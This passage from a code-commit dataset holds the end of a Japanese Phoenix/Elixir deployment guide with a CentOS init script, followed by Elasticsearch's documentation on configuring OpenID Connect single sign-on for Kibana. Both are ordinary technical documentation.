Ecto.Adapters.Postgres,\n username: \"postgres\",\n password: \"postgres\",\n database: \"hello_phoenix_prod\",\n pool_size: 20\n\n```\n\n\n## \u4f9d\u5b58\u30d5\u30a1\u30a4\u30eb\u306e\u53d6\u5f97\u306a\u3069\n\nPhoenix framework \u3067\u306f\u3001 http:\/\/www.phoenixframework.org\/docs\/advanced-deployment[Exrm(Elixir Release Manager)] 
\u306b\u3088\u308b\u30ea\u30ea\u30fc\u30b9\u30d3\u30eb\u30c9\u3092\u63a8\u5968\u3057\u3066\u3044\u307e\u3059\u3002\u30ea\u30ea\u30fc\u30b9\u4f5c\u696d\u306b\u306f https:\/\/github.com\/bitwalker\/exrm[exrm] \u30d1\u30c3\u30b1\u30fc\u30b8\u304c\u5fc5\u8981\u3067\u3059\u3002phoenix-sample \u306f\u4fee\u6b63\u3055\u308c\u3066\u3044\u308b\u306e\u3067\u3059\u304c\u3001\u305d\u308c\u4ee5\u5916\u306e\u5834\u5408\u306b\u306f mix.exs \u3092\u78ba\u8a8d\u3057\u3066\u3001deps \u306b exrm \u3092\u8ffd\u52a0\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n```\n$ cat mix.exs\n...\n(\u4e2d\u7565)\n...\ndefp deps do\n [{:phoenix, \"~> 1.0,0\"},\n {:phoenix_ecto, \"~> 1.1\"},\n {:postgrex, \">= 0.0.0\"},\n {:phoenix_html, \"~> 2.1\"},\n {:phoenix_live_reload, \"~> 1.0\", only: :dev},\n {:cowboy, \"~> 1.0\"},\n {:exrm, \"~> 0.15.3\"}]\u3000\u3000\u3000\u3000\u3000# \u8ffd\u8a18\nend\n```\n\n\n\n\nbrunch.js \u304c\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u3066\u3044\u306a\u3044\u5834\u5408\u306f `` npm i -g brunch`` \u3067\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n```\n$ mix deps.get --only prod # \u4f9d\u5b58\u30d5\u30a1\u30a4\u30eb\u306e\u53d6\u5f97\n$ MIX_ENV=prod mix compile # ex \u30d5\u30a1\u30a4\u30eb\u306e\u30b3\u30f3\u30d1\u30a4\u30eb\n$ brunch b -P # asset \u306e\u30d3\u30eb\u30c9\n$ MIX_ENV=prod mix phoenix.digest\n$ MIX_ENV=prod mix ecto.migrate\n$ MIX_ENV=prod mix release\n```\nrelease \u306f\u5c11\u3057\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002\u7d42\u4e86\u3059\u308b\u3068 rel \u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u914d\u4e0b\u306b\u30ea\u30ea\u30fc\u30b9\u7528\u30d5\u30a1\u30a4\u30eb\u304c\u751f\u6210\u3055\u308c\u307e\u3059\u3002\u306a\u304a\u3001release \u3092\u3084\u308a\u76f4\u3059\u5834\u5408\u306f ``mix release.clean`` \u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\n\n\n## \u30c7\u30fc\u30e2\u30f3\u3067\u5b9f\u884c\n\nCentOS 6 \u306e service \u306b\u30c7\u30fc\u30e2\u30f3\u3068\u3057\u3066\u767b\u9332\u3059\u308b\u3002Upstart \u306f CentOS6 \u306e\u3082\u306e\u304c 0.6.5 \u3068\u53e4\u304f\u3001\u30e6\u30fc\u30b6\u30fc\u3092\u5207\u308a\u66ff\u3048\u3066\u5b9f\u884c\u304c\u3067\u304d\u306a\u304b\u3063\u305f\u3081\u3001\u4fdd\u7559\u3068\u3057\u307e\u3057\u305f\u3002\u65b0\u3057\u3044 Upstart \u306e\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u304c\u5206\u304b\u308c\u3070\u8a66\u3057\u3066\u307f\u305f\u3044\u3067\u3059\u3002\u516c\u5f0f\u3067\u306f Ubuntu \u3067\u5b9f\u884c\u3059\u308b\u305f\u3081\u306e http:\/\/www.phoenixframework.org\/docs\/advanced-deployment#section-setting-up-our-init-system[Upstart \u306e\u30b9\u30af\u30ea\u30d7\u30c8] \u304c\u516c\u958b\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n\n```\n$ cat \/etc\/init.d\/todo-phoenix\n#!\/bin\/sh\n#\n\n. 
\/etc\/rc.d\/init.d\/functions\n\nPROG_NAME=todo-phoenix\nUSER=phoenix\nAPP_ROOT=\/home\/phoenix\/git\/phoenix-sample\nMIX_ENV=prod\nSTART_CMD=\"rel\/hello_phoenix\/bin\/hello_phoenix start -detached\"\nSTOP_CMD=\"rel\/hello_phoenix\/bin\/hello_phoenix stop\"\n\nexport PATH=\/usr\/elixir\/bin:\/usr\/local\/bin:$PATH\ncd $APP_ROOT || exit 1\n\ncase $1 in\n start)\n echo -n $\"Starting $PROG_NAME: \"\n sudo -u phoenix $START_CMD\n ;;\n stop)\n echo -n $\"Shutting down $PROG_NAME: \"\n sudo -u phoenix $STOP_CMD\n ;;\n restart)\n echo -n $\"Restarting $PROG_NAME: \"\n sudo -u phoenix $STOP_CMD\n sudo -u phoenix $START_CMD\n ;;\n *)\n echo >&2 \"Usage: $0 <start|stop|restart>\"\n exit 1\n ;;\nesac\nexit $?\n```\n\n\u3053\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u306b\u3088\u308a ``sudo service todo-phoenix start`` \u3067\u8d77\u52d5\u3057\u3001``sudo service todo-phoenix stop`` \u3067\u505c\u6b62\u3057\u307e\u3059\u3002\u3053\u3053\u3067\u6ce8\u610f\u3059\u308b\u306e\u306f\u3001\u8d77\u52d5\u6642\u306f ``hello_phoenix start -detached`` \u3068 -detached \u30aa\u30d7\u30b7\u30e7\u30f3\u3092\u4ed8\u3051\u3066\u8d77\u52d5\u3059\u308b\u3053\u3068\u3067\u3059\u3002start \u3060\u3051\u3060\u3068\u30c7\u30fc\u30e2\u30f3\u3067\u5b9f\u884c\u3057\u3066\u3082\u30b3\u30f3\u30bd\u30fc\u30eb\u306b\u51fa\u529b\u3057\u3066\u3044\u308b\u3089\u3057\u304f\u3001\u8ca0\u8377\u3092\u304b\u3051\u308b\u3068\u30e1\u30e2\u30ea\u30fc\u4e0d\u8db3\u3068\u306a\u308a\u307e\u3059\u3002\n\n\u8a73\u3057\u304f\u306f http:\/\/qiita.com\/maruware\/items\/7765837384795b1d9659[phoenix\u3067mix release\u3057\u305f\u3068\u304d\u306b\u30e1\u30e2\u30ea\u304c\u6ea2\u308c\u308b\u306e\u3092\u89e3\u6c7a - Qiita] \u3092\u53c2\u8003\u306b\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"cd58f2a22e5e11689eb266be3e56ddcf9ff41ad0","subject":"Update logout guide for OIDC (#61624)","message":"Update logout guide for OIDC (#61624)\n\nKibana has changed the routes for the `logged_out` page in latest\r\nreleases and also now offers a login selector. This commit updates\r\nthe OIDC guide to reflect that.\r\n","repos":"nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"x-pack\/docs\/en\/security\/authentication\/oidc-guide.asciidoc","new_file":"x-pack\/docs\/en\/security\/authentication\/oidc-guide.asciidoc","new_contents":"[role=\"xpack\"]\n[[oidc-guide]]\n\n== Configuring single sign-on to the {stack} using OpenID Connect\n\nThe Elastic Stack supports single sign-on (SSO) using OpenID Connect via {kib} using\n{es} as the backend service that holds most of the functionality. 
{kib} and {es}\ntogether represent an OpenID Connect Relying Party (RP) that supports the authorization code flow and implicit flow as these are defined in the OpenID Connect specification.\n\nThis guide assumes that you have an OpenID Connect Provider where the\nElastic Stack Relying Party will be registered.\n\nNOTE: The OpenID Connect realm support in {kib} is designed with the expectation that it\nwill be the primary authentication method for the users of that {kib} instance. The\n<<oidc-kibana>> section describes what this entails and how you can set it up to support\nother realms if necessary.\n\n[[oidc-guide-op]]\n=== The OpenID Connect Provider\n\nThe OpenID Connect Provider (OP) is the entity in OpenID Connect that is responsible for\nauthenticating the user and for granting the necessary tokens with the authentication and\nuser information to be consumed by the Relying Parties.\n\nIn order for the Elastic Stack to be able to use your OpenID Connect Provider for authentication,\na trust relationship needs to be established between the OP and the RP. In the OpenID Connect\nProvider, this means registering the RP as a client. OpenID Connect defines a dynamic client\nregistration protocol, but this is usually geared towards real-time client registration and\nnot the trust establishment process for cross-security-domain single sign-on. All OPs will\nalso allow for the manual registration of an RP as a client, via a user interface or (less often)\nvia the consumption of a metadata document.\n\nThe process for registering the Elastic Stack RP will be different from OP to OP and following\nthe provider's relevant documentation is prudent. The information for the\nRP that you commonly need to provide for registration is the following:\n\n- `Relying Party Name`: An arbitrary identifier for the relying party. Neither the specification\nnor the Elastic Stack implementation imposes any constraints on this value.\n- `Redirect URI`: This is the URI where the OP will redirect the user's browser after authentication. The\nappropriate value for this will depend on your setup and whether or not {kib} sits behind a proxy or\nload balancer. It will typically be +$\\{kibana-url}\/api\/security\/oidc\/callback+ (for the authorization code flow) or +$\\{kibana-url}\/api\/security\/oidc\/implicit+ (for the implicit flow) where _$\\{kibana-url}_ is the base URL for your {kib} instance. You might also see this\ncalled `Callback URI`.\n\nAt the end of the registration process, the OP will assign a Client Identifier and a Client Secret for the RP ({stack}) to use.\nNote these two values as they will be used in the {es} configuration.\n\n[[oidc-guide-authentication]]\n=== Configure {es} for OpenID Connect authentication\n\nThe following is a summary of the configuration steps required in order to enable authentication\nusing OpenID Connect in {es}:\n\n. <<oidc-enable-http,Enable SSL\/TLS for HTTP>>\n. <<oidc-enable-token,Enable the Token Service>>\n. <<oidc-create-realm,Create one or more OpenID Connect realms>>\n. <<oidc-role-mapping,Configure role mappings>>\n\n[[oidc-enable-http]]\n==== Enable TLS for HTTP\n\nIf your {es} cluster is operating in production mode, then you must\nconfigure the HTTP interface to use SSL\/TLS before you can enable OpenID Connect\nauthentication.\n\nFor more information, see\n<<tls-http>>.\n\n[[oidc-enable-token]]\n==== Enable the token service\n\nThe {es} OpenID Connect implementation makes use of the {es} Token Service. 
This service\nis automatically enabled if you configure TLS on the HTTP interface, and can be\nexplicitly configured by including the following in your `elasticsearch.yml` file:\n\n[source, yaml]\n------------------------------------------------------------\nxpack.security.authc.token.enabled: true\n------------------------------------------------------------\n\n[[oidc-create-realm]]\n==== Create an OpenID Connect realm\n\nOpenID Connect based authentication is enabled by configuring the appropriate realm within\nthe authentication chain for {es}.\n\nThis realm has a few mandatory settings, and a number of optional settings.\nThe available settings are described in detail in\n<<ref-oidc-settings>>. This\nguide will explore the most common settings.\n\nCreate an OpenID Connect (the realm type is `oidc`) realm in your `elasticsearch.yml` file\nsimilar to what is shown below:\n\nNOTE: The values used below are meant to be an example and are not intended to apply to\nevery use case. The details below the configuration snippet provide insights and suggestions\nto help you pick the proper values, depending on your OP configuration.\n\n[source, yaml]\n-------------------------------------------------------------------------------------\nxpack.security.authc.realms.oidc.oidc1:\n order: 2\n rp.client_id: \"the_client_id\"\n rp.response_type: code\n rp.redirect_uri: \"https:\/\/kibana.example.org:5601\/api\/security\/oidc\/callback\"\n op.issuer: \"https:\/\/op.example.org\"\n op.authorization_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/authorize\"\n op.token_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/token\"\n op.jwkset_path: oidc\/jwkset.json\n op.userinfo_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/userinfo\"\n op.endsession_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/logout\"\n rp.post_logout_redirect_uri: \"https:\/\/kibana.example.org:5601\/security\/logged_out\"\n claims.principal: sub\n claims.groups: \"http:\/\/example.info\/claims\/groups\"\n-------------------------------------------------------------------------------------\n\nThe configuration values used in the example above are:\n\nxpack.security.authc.realms.oidc.oidc1::\n This defines a new `oidc` authentication realm named \"oidc1\".\n See <<realms>> for more explanation of realms.\n\norder::\n You should define a unique order on each realm in your authentication chain.\n It is recommended that the OpenID Connect realm be at the bottom of your authentication\n chain (that is, that it has the _highest_ order).\n\nrp.client_id::\n This, usually opaque, arbitrary string, is the Client Identifier that was assigned to the Elastic Stack RP by the OP upon\n registration.\n\nrp.response_type::\n This is an identifier that controls which OpenID Connect authentication flow this RP supports and also\n which flow this RP requests the OP should follow. Supported values are\n - `code`, which means that the RP wants to use the Authorization Code flow. If your OP supports the\n Authorization Code flow, you should select this instead of the Implicit Flow.\n - `id_token token` which means that the RP wants to use the Implicit flow and we also request an oAuth2\n access token from the OP, that we can potentially use for follow up requests ( UserInfo ). 
This\n should be selected if the OP offers a UserInfo endpoint in its configuration, or if you know that\n the claims you will need to use for role mapping are not available in the ID Token.\n - `id_token` which means that the RP wants to use the Implicit flow, but is not interested in getting\n an oAuth2 token too. Select this if you are certain that all necessary claims will be contained in\n the ID Token or if the OP doesn't offer a User Info endpoint.\n\nrp.redirect_uri::\n The redirect URI where the OP will redirect the browser after authentication. This needs to be\n _exactly_ the same as the one <<oidc-guide-op, configured with the OP upon registration>> and will\n typically be +$\\{kibana-url}\/api\/security\/oidc\/callback+ where _$\\{kibana-url}_ is the base URL for your {kib} instance\n\nop.issuer::\n A verifiable Identifier for your OpenID Connect Provider. An Issuer Identifier is usually a case sensitive URL.\n The value for this setting should be provided by your OpenID Connect Provider.\n\nop.authorization_endpoint::\n The URL for the Authorization Endpoint in the OP. This is where the user's browser\n will be redirected to start the authentication process. The value for this setting should be provided by your\n OpenID Connect Provider.\n\nop.token_endpoint::\n The URL for the Token Endpoint in the OpenID Connect Provider. This is the endpoint where\n {es} will send a request to exchange the code for an ID Token. This setting is optional when\n you use the implicit flow. The value for this setting should be provided by your OpenID Connect Provider.\n\nop.jwkset_path::\n The path to a file or a URL containing a JSON Web Key Set with the key material that the OpenID Connect\n Provider uses for signing tokens and claims responses. If a path is set, it is resolved relative to the {es}\n config directory.\n {es} will automatically monitor this file for changes and will reload the configuration whenever\n it is updated. Your OpenID Connect Provider should provide you with this file or a URL where it is available.\n\nop.userinfo_endpoint::\n (Optional) The URL for the UserInfo Endpoint in the OpenID Connect Provider. This is the endpoint of the OP that\n can be queried to get further user information, if required. The value for this setting should be provided by your\n OpenID Connect Provider.\n\nop.endsession_endpoint::\n (Optional) The URL to the End Session Endpoint in the OpenID Connect Provider. This is the endpoint where the user's\n browser will be redirected after local logout, if the realm is configured for RP initiated Single Logout and\n the OP supports it. The value for this setting should be provided by your OpenID Connect Provider.\n\nrp.post_logout_redirect_uri::\n (Optional) The Redirect URL where the OpenID Connect Provider should redirect the user after a\n successful Single Logout (assuming `op.endsession_endpoint` above is also set). This should be set to a value that\n will not trigger a new OpenID Connect Authentication, such as +$\\{kibana-url}\/security\/logged_out+ or\n +$\\{kibana-url}\/login?msg=LOGGED_OUT+ where _$\\{kibana-url}_ is the base URL for your {kib} instance.\n\nclaims.principal:: See <<oidc-claims-mapping>>.\nclaims.groups:: See <<oidc-claims-mapping>>.\n\nA final piece of configuration of the OpenID Connect realm is to set the `Client Secret` that was assigned\nto the RP during registration in the OP. 
This is a secure setting and as such is not defined in the realm\nconfiguration in `elasticsearch.yml` but added to the\n<<secure-settings,elasticsearch keystore>>.\nFor instance:\n\n\n[source,sh]\n----\nbin\/elasticsearch-keystore add xpack.security.authc.realms.oidc.oidc1.rp.client_secret\n----\n\n\nNOTE: According to the OpenID Connect specification, the OP should also make their configuration\navailable at a well-known URL, which is the concatenation of their `Issuer` value with the\n`.well-known\/openid-configuration` string. For example: `https:\/\/op.org.com\/.well-known\/openid-configuration`.\nThat document should contain all the necessary information to configure the OpenID Connect realm in {es}.\n\n\n[[oidc-claims-mapping]]\n==== Claims mapping\n\n===== Claims and scopes\n\nWhen authenticating to {kib} using OpenID Connect, the OP will provide information about the user\nin the form of OpenID Connect Claims, which can be included either in the ID Token or retrieved from the\nUserInfo endpoint of the OP. A claim is defined as a piece of information asserted by the OP\nfor the authenticated user. Simply put, a claim is a name\/value pair that contains information about\nthe user. Related to claims, we also have the notion of OpenID Connect Scopes. Scopes are identifiers\nthat are used to request access to specific lists of claims. The standard defines a set of scope\nidentifiers that can be requested. The only mandatory one is `openid`, while commonly used ones are\n`profile` and `email`. The `profile` scope requests access to the `name`,`family_name`,`given_name`,`middle_name`,`nickname`,\n`preferred_username`,`profile`,`picture`,`website`,`gender`,`birthdate`,`zoneinfo`,`locale`, and `updated_at` claims.\nThe `email` scope requests access to the `email` and `email_verified` claims. The process is that\nthe RP requests specific scopes during the authentication request. If the OP Privacy Policy\nallows it and the authenticating user consents to it, the related claims are returned to the\nRP (either in the ID Token or as a UserInfo response).\n\n
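For example, if the claims you plan to map are covered by the `profile` and `email` scopes, the realm can ask for them through the `rp.requested_scopes` setting. A minimal sketch (whether the corresponding claims are actually released still depends on the OP's policy and the user's consent):\n\n[source, yaml]\n-------------------------------------------------------------------------------------\nxpack.security.authc.realms.oidc.oidc1:\n ...\n rp.requested_scopes: [\"openid\", \"profile\", \"email\"]\n-------------------------------------------------------------------------------------\n\n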
The list of the supported claims will vary depending on the OP you are using, but you can expect\nthe https:\/\/openid.net\/specs\/openid-connect-core-1_0.html#StandardClaims[Standard Claims] to be\nlargely supported.\n\n[[oidc-claim-to-property]]\n===== Mapping claims to user properties\n\nThe goal of claims mapping is to configure {es} in such a way as to be able to map the values of\nspecified returned claims to one of the <<oidc-user-properties, user properties>> that are supported\nby {es}. These user properties are then utilized to identify the user in the {kib} UI or the audit\nlogs, and can also be used to create <<oidc-role-mapping, role mapping>> rules.\n\nThe recommended steps for configuring OpenID Claims mapping are as follows:\n\n. Consult your OP configuration to see what claims it might support. Note that\n the list provided in the OP's metadata or in the configuration page of the OP\n is a list of potentially supported claims. However, for privacy reasons it might\n not be a complete one, or not all supported claims will be available for all\n authenticated users.\n\n. Read through the list of <<oidc-user-properties, user properties>> that {es}\n supports, and decide which of them are useful to you, and can be provided by\n your OP in the form of claims. At a _minimum_, the `principal` user property\n is required.\n\n. Configure your OP to \"release\" those claims to your {stack} Relying\n party. This process varies greatly by provider. Some providers only support a static\n configuration, while others allow the RP to request, at authentication time, the scopes that\n correspond to the claims to be \"released\". See\n <<ref-oidc-settings,`rp.requested_scopes`>> for details about how\n to configure the scopes to request. To ensure interoperability and minimize\n errors, you should only request scopes that the OP supports, and which you\n intend to map to {es} user properties.\n\n NOTE: You can only map claims with values that are strings, numbers, boolean values or an array\n of the aforementioned.\n\n. Configure the OpenID Connect realm in {es} to associate the {es} user properties (see\n <<oidc-user-properties, the listing>> below) to the name of the claims that your\n OP will release. In the example above, we have configured the `principal` and\n `groups` user properties as follows:\n\n .. `claims.principal: sub` : This instructs {es} to look for the OpenID Connect claim named `sub`\n in the ID Token that the OP issued for the user (or in the UserInfo response) and assign the\n value of this claim to the `principal` user property. `sub` is a commonly used claim for the\n principal property as it is an identifier of the user in the OP and it is also a required\n claim of the ID Token, thus offering guarantees that it will be available. It is, however,\n only used as an example here; the OP may provide another claim that is a better fit for your needs.\n\n .. `claims.groups: \"http:\/\/example.info\/claims\/groups\"` : Similarly, this instructs {es} to look\n for the claim with the name `http:\/\/example.info\/claims\/groups` (note that this is a URI - an\n identifier, treated as a string and not a URL pointing to a location that will be retrieved)\n either in the ID Token or in the UserInfo response, and map the value(s) of it to the user\n property `groups` in {es}. There is no standard claim in the specification that is used for\n expressing roles or group memberships of the authenticated user in the OP, so the name of the\n claim that should be mapped here will vary greatly between providers. Consult your OP\n documentation for more details.\n\n[[oidc-user-properties]]\n===== {es} user properties\n\nThe {es} OpenID Connect realm can be configured to map OpenID Connect claims to the\nfollowing properties on the authenticated user:\n\nprincipal:: _(Required)_\n This is the _username_ that will be applied to a user that authenticates\n against this realm.\n The `principal` appears in places such as the {es} audit logs.\n\nNOTE: If the principal property fails to be mapped from a claim, the authentication fails.\n\ngroups:: _(Recommended)_\n If you wish to use your OP's concept of groups or roles as the basis for a\n user's {es} privileges, you should map them with this property.\n The `groups` are passed directly to your <<oidc-role-mapping, role mapping rules>>.\n\nname:: _(Optional)_ The user's full name.\nmail:: _(Optional)_ The user's email address.\ndn:: _(Optional)_ The user's X.500 _Distinguished Name_.\n\n\n===== Extracting partial values from OpenID Connect claims\n\nThere are some occasions where the value of a claim may contain more information\nthan you wish to use within {es}. 
A common example of this is one where the\nOP works exclusively with email addresses, but you would like the user's\n`principal` to use the _local-name_ part of the email address.\nFor example if their email address was `james.wong@staff.example.com`, then you\nwould like their principal to simply be `james.wong`.\n\nThis can be achieved using the `claim_patterns` setting in the {es}\nrealm, as demonstrated in the realm configuration below:\n\n[source, yaml]\n-------------------------------------------------------------------------------------\nxpack.security.authc.realms.oidc.oidc1:\n order: 2\n rp.client_id: \"the_client_id\"\n rp.response_type: code\n rp.redirect_uri: \"https:\/\/kibana.example.org:5601\/api\/security\/oidc\/callback\"\n op.authorization_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/authorize\"\n op.token_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/token\"\n op.userinfo_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/userinfo\"\n op.endsession_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/logout\"\n op.issuer: \"https:\/\/op.example.org\"\n op.jwkset_path: oidc\/jwkset.json\n claims.principal: email_verified\n claim_patterns.principal: \"^([^@]+)@staff\\\\.example\\\\.com$\"\n-------------------------------------------------------------------------------------\n\nIn this case, the user's `principal` is mapped from the `email_verified` claim, but a\nregular expression is applied to the value before it is assigned to the user.\nIf the regular expression matches, then the result of the first group is used as the\neffective value. If the regular expression does not match then the claim\nmapping fails.\n\nIn this example, the email address must belong to the `staff.example.com` domain,\nand then the local-part (anything before the `@`) is used as the principal.\nAny users who try to login using a different email domain will fail because the\nregular expression will not match against their email address, and thus their\nprincipal user property - which is mandatory - will not be populated.\n\nIMPORTANT: Small mistakes in these regular expressions can have significant\nsecurity consequences. For example, if we accidentally left off the trailing\n`$` from the example above, then we would match any email address where the\ndomain starts with `staff.example.com`, and this would accept an email\naddress such as `admin@staff.example.com.attacker.net`. It is important that\nyou make sure your regular expressions are as precise as possible so that\nyou do not inadvertently open an avenue for user impersonation attacks.\n\n[[third-party-login]]\n==== Third party initiated single sign-on\n\nThe Open ID Connect realm in {es} supports 3rd party initiated login as described in the\nhttps:\/\/openid.net\/specs\/openid-connect-core-1_0.html#ThirdPartyInitiatedLogin[relevant specification].\n\nThis allows the OP itself or another, third party other than the RP, to initiate the authentication\nprocess while requesting the OP to be used for the authentication. 
Please note that the Elastic\nStack RP should already be configured for this OP, in order for this process to succeed.\n\n\n[[oidc-logout]]\n==== OpenID Connect Logout\n\nThe OpenID Connect realm in {es} supports RP-Initiated Logout Functionality as\ndescribed in the\nhttps:\/\/openid.net\/specs\/openid-connect-session-1_0.html#RPLogout[relevant part of the specification]\n\nIn this process, the OpenID Connect RP (the Elastic Stack in this case) will redirect the user's\nbrowser to a predefined URL of the OP after successfully completing a local logout. The OP can then\nalso log out the user, depending on the configuration, and should finally redirect the user back to the\nRP. The `op.endsession_endpoint` in the realm configuration determines the URL in the OP that the browser\nwill be redirected to. The `rp.post_logout_redirect_uri` setting determines the URL to redirect\nthe user back to after the OP logs them out.\n\nWhen configuring `rp.post_logout_redirect_uri`, care should be taken not to point this to a URL that\nwill trigger re-authentication of the user. For instance, when using OpenID Connect to support\nsingle sign-on to {kib}, this could be set to either +$\\{kibana-url}\/security\/logged_out+, which will show a\nuser-friendly message to the user, or +$\\{kibana-url}\/login?msg=LOGGED_OUT+, which will take the user to the login selector in {kib}.\n\n[[oidc-ssl-config]]\n==== OpenID Connect Realm SSL Configuration\n\nOpenID Connect depends on TLS to provide security properties such as encryption in transit and endpoint authentication. The RP\nis required to establish back-channel communication with the OP in order to exchange the code for an ID Token during the\nAuthorization code grant flow and in order to get additional user information from the UserInfo endpoint. Furthermore, if\nyou configure `op.jwks_path` as a URL, {es} will need to get the OP's signing keys from the file hosted there. As such, it is\nimportant that {es} can validate and trust the server certificate that the OP uses for TLS. Since the system truststore is\nused for the client context of outgoing https connections, if your OP is using a certificate from a trusted CA, no additional\nconfiguration is needed.\n\nHowever, if the issuer of your OP's certificate is not trusted by the JVM on which {es} is running (e.g. it uses an organizational CA), then you must configure\n{es} to trust that CA. Assuming that you have the CA certificate that has signed the certificate that the OP uses for TLS\nstored in the `\/oidc\/company-ca.pem` file within the configuration directory of {es}, you need to set the following\nproperty in the realm configuration:\n\n[source, yaml]\n-------------------------------------------------------------------------------------\nxpack.security.authc.realms.oidc.oidc1:\n order: 1\n ...\n ssl.certificate_authorities: [\"\/oidc\/company-ca.pem\"]\n-------------------------------------------------------------------------------------\n\n[[oidc-role-mapping]]\n=== Configuring role mappings\n\nWhen a user authenticates using OpenID Connect, they are identified to the Elastic Stack,\nbut this does not automatically grant them access to perform any actions or\naccess any data.\n\nYour OpenID Connect users cannot do anything until they are assigned roles. 
This can be done\nthrough either the\n<<security-api-put-role-mapping,add role mapping API>> or with\n<<authorization_realms,authorization realms>>.\n\nNOTE: You cannot use <<mapping-roles-file,role mapping files>>\nto grant roles to users authenticating via OpenID Connect.\n\nThis is an example of a simple role mapping that grants the `example_role` role\nto any user who authenticates against the `oidc1` OpenID Connect realm:\n\n[source,console]\n--------------------------------------------------\nPUT \/_security\/role_mapping\/oidc-example\n{\n \"roles\": [ \"example_role\" ], <1>\n \"enabled\": true,\n \"rules\": {\n \"field\": { \"realm.name\": \"oidc1\" }\n }\n}\n--------------------------------------------------\n\n<1> The `example_role` role is *not* a built-in Elasticsearch role.\nThis example assumes that you have created a custom role of your own, with\nappropriate access to your <<roles-indices-priv,data streams, indices,>> and\n{kibana-ref}\/kibana-privileges.html#kibana-feature-privileges[Kibana features].\n\nThe user properties that are mapped via the realm configuration are used to process\nrole mapping rules, and these rules determine which roles a user is granted.\n\nThe user fields that are provided to the role\nmapping are derived from the OpenID Connect claims as follows:\n\n- `username`: The `principal` user property\n- `dn`: The `dn` user property\n- `groups`: The `groups` user property\n- `metadata`: See <<oidc-user-metadata>>\n\nFor more information, see <<mapping-roles>> and\n<<security-role-mapping-apis>>.\n\nIf your OP has the ability to provide groups or roles to RPs via the use of\nan OpenID Claim, then you should map this claim to the `claims.groups` setting in\nthe {es} realm (see <<oidc-claim-to-property>>), and then make use of it in a role mapping\nas per the example below.\n\nThis mapping grants the {es} `finance_data` role to any users who authenticate\nvia the `oidc1` realm with the `finance-team` group membership.\n\n[source,console]\n--------------------------------------------------\nPUT \/_security\/role_mapping\/oidc-finance\n{\n \"roles\": [ \"finance_data\" ],\n \"enabled\": true,\n \"rules\": { \"all\": [\n { \"field\": { \"realm.name\": \"oidc1\" } },\n { \"field\": { \"groups\": \"finance-team\" } }\n ] }\n}\n--------------------------------------------------\n\nIf your users also exist in a repository that can be directly accessed by {es}\n(such as an LDAP directory) then you can use\n<<authorization_realms, authorization realms>> instead of role mappings.\n\nIn this case, you perform the following steps:\n\n1. In your OpenID Connect realm, assign a claim to act as the lookup userid,\n by configuring the `claims.principal` setting.\n2. Create a new realm that can look up users from your local repository (e.g. an\n `ldap` realm).\n3. In your OpenID Connect realm, set `authorization_realms` to the name of the realm you\n created in step 2, as sketched below.\n\n
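A minimal sketch of what steps 1 and 3 can look like in the realm configuration (the `mail` claim and the `ldap1` realm name are illustrative assumptions):\n\n[source, yaml]\n-------------------------------------------------------------------------------------\nxpack.security.authc.realms.oidc.oidc1:\n ...\n claims.principal: mail\n authorization_realms: [\"ldap1\"]\n-------------------------------------------------------------------------------------\n\n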
Note that the metadata will\ninclude all the https:\/\/openid.net\/specs\/openid-connect-core-1_0.html#IDToken[ID Token claims]\nthat pertain to the authentication event, rather than to the user themselves.\n\nThis behaviour can be disabled by adding `populate_user_metadata: false` as\na setting in the oidc realm.\n\n[[oidc-kibana]]\n=== Configuring {kib}\n\nOpenID Connect authentication in {kib} requires a small number of settings\nin addition to the standard {kib} security configuration. The\n{kibana-ref}\/using-kibana-with-security.html[{kib} security documentation]\nprovides details on the available configuration options that you can apply.\n\nIn particular, since your {es} nodes have been configured to use TLS on the HTTP\ninterface, you must configure {kib} to use an `https` URL to connect to {es}, and\nyou may need to configure `elasticsearch.ssl.certificateAuthorities` to trust\nthe certificates that {es} has been configured to use.\n\nOpenID Connect authentication in {kib} is also subject to the\n`xpack.security.sessionTimeout` setting that is described in the {kib} security\ndocumentation, and you may wish to adjust this timeout to meet your local needs.\n\nThe additional settings that are required for OpenID Connect support are shown below:\n\n[source, yaml]\n------------------------------------------------------------\nxpack.security.authc.providers:\n oidc.oidc1:\n order: 0\n realm: \"oidc1\"\n------------------------------------------------------------\n\nThe configuration values used in the example above are:\n\n`xpack.security.authc.providers`::\nAdd the `oidc` provider to instruct {kib} to use OpenID Connect single sign-on as the\nauthentication method. This instructs Kibana to attempt to initiate an SSO flow\nevery time a user attempts to access a URL in Kibana, if the user is not already\nauthenticated. If you also want to allow users to log in with a username and password,\nyou must enable the `basic` authentication provider too. For example:\n\n[source, yaml]\n------------------------------------------------------------\nxpack.security.authc.providers:\n oidc.oidc1:\n order: 0\n realm: \"oidc1\"\n basic.basic1:\n order: 1\n------------------------------------------------------------\n\nThis will allow users that haven't already authenticated with OpenID Connect to\nlog in using the {kib} login form.\n\n`xpack.security.authc.providers.oidc.<provider-name>.realm`::\nThe name of the OpenID Connect realm in {es} that should handle authentication\nfor this Kibana 